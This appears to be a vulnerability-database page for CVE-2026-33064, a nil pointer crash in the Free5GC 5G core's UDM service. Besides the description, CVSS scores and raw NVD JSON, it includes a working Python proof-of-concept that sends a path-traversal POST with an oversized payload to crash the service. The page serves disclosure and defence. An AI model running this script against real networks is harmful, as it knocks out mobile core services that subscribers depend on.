Security Vulnerability Report
中文
CVE-2026-33064 CVSS 7.5 HIGH

CVE-2026-33064

Published: 2026-03-20 08:16:12
Last Modified: 2026-03-23 18:43:25
Source: [email protected]

Description

Free5GC is an open-source Linux Foundation project for 5th generation (5G) mobile core networks. Versions prior to 1.4.2 are vulnerable to procedure panic caused by Nil Pointer Dereference in the /sdm-subscriptions endpoint. A remote attacker can cause the UDM service to panic and crash by sending a crafted POST request to the /sdm-subscriptions endpoint with a malformed URL path containing path traversal sequences (../) and a large JSON payload. The DataChangeNotificationProcedure function in notifier.go attempts to access a nil pointer without proper validation, causing a complete service crash with "runtime error: invalid memory address or nil pointer dereference". Exploitation would result in UDM functionality disruption until recovery by restart. This issue has been fixed in version 1.4.2.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:free5gc:udm:*:*:*:*:*:go:*:* - VULNERABLE
Free5GC < 1.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json def exploit_free5gc_udm(target_ip): """ PoC for CVE-2026-33064: Free5GC UDM Nil Pointer Dereference Triggers a panic by sending a crafted POST request to /sdm-subscriptions with path traversal and a large payload. """ # Construct the malicious URL with path traversal # The endpoint might vary based on deployment, standard is often on port 29503 base_url = f"http://{target_ip}:29503" malicious_path = "/nudm-sdm/v2/sdm-subscriptions/../../" target_url = base_url + malicious_path # Create a large JSON payload to trigger the parsing condition large_payload = { "callbackReference": { "notifyURI": "http://dummy.com/callback" }, "monitoredResourceUris": ["A" * 10000], # Large string to stress memory handling "subscriptionId": "test-subscription-123" } headers = { "Content-Type": "application/json", "Accept": "application/json" } try: print(f"[+] Sending exploit payload to {target_url}") response = requests.post(target_url, data=json.dumps(large_payload), headers=headers, timeout=5) # If the service crashes, we might not get a response or get a connection error print(f"[+] Response Status Code: {response.status_code}") print(f"[+] Response Text: {response.text}") print("[+] Exploit sent. Check if the UDM service has crashed.") except requests.exceptions.RequestException as e: print(f"[!] Request failed (Service might have crashed): {e}") if __name__ == "__main__": target = "127.0.0.1" # Replace with actual target IP exploit_free5gc_udm(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33064", "sourceIdentifier": "[email protected]", "published": "2026-03-20T08:16:12.257", "lastModified": "2026-03-23T18:43:25.237", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Free5GC is an open-source Linux Foundation project for 5th generation (5G) mobile core networks. Versions prior to 1.4.2 are vulnerable to procedure panic caused by Nil Pointer Dereference in the /sdm-subscriptions endpoint. A remote attacker can cause the UDM service to panic and crash by sending a crafted POST request to the /sdm-subscriptions endpoint with a malformed URL path containing path traversal sequences (../) and a large JSON payload. The DataChangeNotificationProcedure function in notifier.go attempts to access a nil pointer without proper validation, causing a complete service crash with \"runtime error: invalid memory address or nil pointer dereference\". Exploitation would result in UDM functionality disruption until recovery by restart. This issue has been fixed in version 1.4.2."}, {"lang": "es", "value": "Free5GC es un proyecto de código abierto de la Linux Foundation para redes centrales móviles de quinta generación (5G). Las versiones anteriores a la 1.4.2 son vulnerables a un pánico de procedimiento causado por una desreferenciación de puntero nulo (Nil Pointer Dereference) en el endpoint /sdm-subscriptions. Un atacante remoto puede causar que el servicio UDM entre en pánico y falle enviando una solicitud POST manipulada al endpoint /sdm-subscriptions con una ruta URL malformada que contenga secuencias de salto de ruta (../) y una carga útil JSON grande. La función DataChangeNotificationProcedure en notifier.go intenta acceder a un puntero nulo sin la validación adecuada, lo que provoca un fallo completo del servicio con el error 'runtime error: invalid memory address or nil pointer dereference'. La explotación resultaría en la interrupción de la funcionalidad del UDM hasta su recuperación mediante un reinicio. Este problema ha sido solucionado en la versión 1.4.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-478"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:free5gc:udm:*:*:*:*:*:go:*:*", "versionEndExcluding": "1.4.2", "matchCriteriaId": "C4C4212B-95F4-49DD-B6DA-F6DF4D8D7257"}]}]}], "references": [{"url": "https://github.com/free5gc/free5gc/issues/781", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-7g27-v5wj-jr75", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://github.com/free5gc/udm/commi ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.